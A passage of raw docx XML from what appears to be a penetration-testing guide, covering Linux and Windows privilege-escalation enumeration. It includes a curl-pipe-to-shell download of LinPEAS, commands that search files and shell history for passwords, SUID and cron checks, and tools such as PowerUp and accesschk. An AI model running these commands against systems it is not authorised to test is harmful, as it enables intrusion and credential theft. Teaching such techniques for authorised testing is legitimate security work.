          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 8: Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting initial access is only step one. Privilege escalation is the process of going from a limited user to a more powerful one - ideally SYSTEM on Windows or root on Linux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1 Linux Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal on Linux is to get root. Here are the most common paths:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Automated Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># LinPEAS - most comprehensive Linux priv esc enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># LinEnum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">./LinEnum.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual Checks:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Who am I and what can I do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami &amp;&amp; id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l                    # What can I run as sudo?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Writable files and directories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -writable -type f 2&gt;/dev/null | grep -v proc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cron jobs (check for writable scripts run by root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la /etc/cron.*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Check for passwords in common locations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name '*.txt' -exec grep -i password {} \; 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name '.bash_history' 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cat ~/.bash_history</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Check services running as root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux | grep root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Kernel exploits (last resort - can crash system)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -a                   # Get kernel version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit linux kernel $(uname -r)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">8.2 Windows Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On Windows, the goal is SYSTEM (or Domain Admin in an AD environment).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Automated Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># WinPEAS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">winpeas.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># PowerUp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Import-Module .\PowerUp.ps1; Invoke-AllChecks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual Checks:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Current user and privileges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami /all</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Unquoted service paths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">wmic service get name,displayname,pathname,startmode | findstr /i 'auto' | findstr /v '"'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Weak service permissions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">accesschk.exe -uwcqv "Authenticated Users" *</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
